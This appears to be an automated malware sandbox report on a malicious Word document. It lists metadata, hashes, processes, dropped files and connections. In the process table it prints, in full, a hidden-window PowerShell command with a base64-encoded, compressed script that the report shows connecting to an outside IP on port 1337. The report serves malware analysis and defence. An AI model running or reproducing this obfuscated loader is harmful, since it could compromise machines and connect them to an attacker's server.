File name: | 836ffe62de205e503c1f2b9a8fd9032f2d8e18b18fd928faccd24c8a07e7c854.doc |
Full analysis: | https://app.any.run/tasks/8b96e012-bd27-4afd-b5a5-31e93a5c386e |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 13:10:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: user, Template: Normal.dotm, Last Saved By: user, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Jul 13 19:39:00 2019, Last Saved Time/Date: Sat Jul 13 19:39:00 2019, Number of Pages: 1, Number of Words: 194, Number of Characters: 1107, Security: 0 |
MD5: | FE546B0F5BF8AE3EDDB5F91C92426C19 |
SHA1: | DCE8431D2F69AD3DC9BB260E4670397B08572616 |
SHA256: | 836FFE62DE205E503C1F2B9A8FD9032F2D8E18B18FD928FACCD24C8A07E7C854 |
SSDEEP: | 384:tIzxcgyGcS2rBQsyDk0jk87FnHhChUehoMqItF51Vc:OcdrSIjCnBChVho9e |
.doc | | | Microsoft Word document (45.7) |
---|---|---|
.xls | | | Microsoft Excel sheet (42.8) |
Author: | user |
---|---|
Template: | Normal.dotm |
LastModifiedBy: | user |
RevisionNumber: | 2 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:07:13 18:39:00 |
ModifyDate: | 2019:07:13 18:39:00 |
Pages: | 1 |
Words: | 194 |
Characters: | 1107 |
Security: | None |
Company: | - |
Lines: | 9 |
Paragraphs: | 2 |
CharCountWithSpaces: | 1299 |
AppVersion: | 12 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CodePage: | Windows Latin 1 (Western European) |
Hyperlinks: |
|
CompObjUserTypeLen: | 39 |
CompObjUserType: | Microsoft Office Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3784 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\836ffe62de205e503c1f2b9a8fd9032f2d8e18b18fd928faccd24c8a07e7c854.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3820 | powershell.exe -WindowStyle hidden -nologo -noprofile -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVgBZADUAUgBhADgASgBBAEUASQBUAGYAQgBmAC8ARABJAGQAZQB5AEIAMwBIAEoAbQBhAFIAUwBRAHcAcAB0AEsARQBVAG8AVgBoAHEAaABEAHkARQBQAEoAbABuADAAVwBoAFAAQgBMAE0AUwBTACsAdAA5ADcAawBWAG8AUQBsAG0ARQBmADUAcAB1AFoAZABtAHQAMgBKAEUAQQByADAAUQAwAEgAcwBxAGsAaQBXAEYAQQA3AGYAcwBzAC8AcQBXAEMAeABJAE0AWgBrAFgAMwB3AFIATgA3AGkASwBsAC8ASABPAFUATQAwAHcAMABwADYAUABFAC8AYwBlAHQAUgArAGcAbgB2AG8AagBSADMAdgBlAFYAQwBsADgASQBVADcANABRAE8AcwBLAFYASgBqAG0AMwAwAHgAcABsAHMAbQBjAEkAeABmAHgATABnAGkAOAA0AE8AZQBtAGMAMAA5AGgAMgB6AGMAQwBTAEIAUABaAE8AbgB5AG4AZABRAG4AVwA1AEwAaQBPAFYAWAB5AGwAZQBzAE4AYgBwAGMAUwA0AEoAdQBHAHEATABwAFQAbAAxAGEASQBWAEgAUgBrAGYAawAzAGcAKwBmADYANgBMAGYAVwBuAHEAegBhAFgAVwB2AHAAYwBjAG8AMABMAFoAYwBBAFEAcAA5ADIANwA2AE0AMgBhAHoAMgBSAGsAOABBADAAOQAyAFgAUQBOAGcANgBDAGgAawBLAFMAWQBQAHQAMQByADEAVQBJAFUAZgBCADgATQBFAEYAdQArAEQAbQB2ADkAQgBwACsASABBADMAaQA4AD0AJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3784 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF388.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3820 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZM3A7RC5OFC1RXWQTIHP.temp | — | |
MD5:— | SHA256:— | |||
3820 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 | |||
3820 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFdfe65.TMP | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 | |||
3784 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$6ffe62de205e503c1f2b9a8fd9032f2d8e18b18fd928faccd24c8a07e7c854.doc | pgc | |
MD5:62F54D8E1399CE250C0D26DADF3CE214 | SHA256:22F8F7F8EAA62C34602D4BC4969861DD0D42EDA0EA85F38E03F8890C1C7C15FB | |||
3784 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:DC5CFC2A06194321FECBA902009F4DAE | SHA256:B07FC3413BAED1CB2297033D59D57BFED7A9BC31CAC9F1F76BB9880CDB4B51ED |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 134.209.145.174:1337 | — | — | US | unknown |
3820 | powershell.exe | 134.209.145.174:1337 | — | — | US | unknown |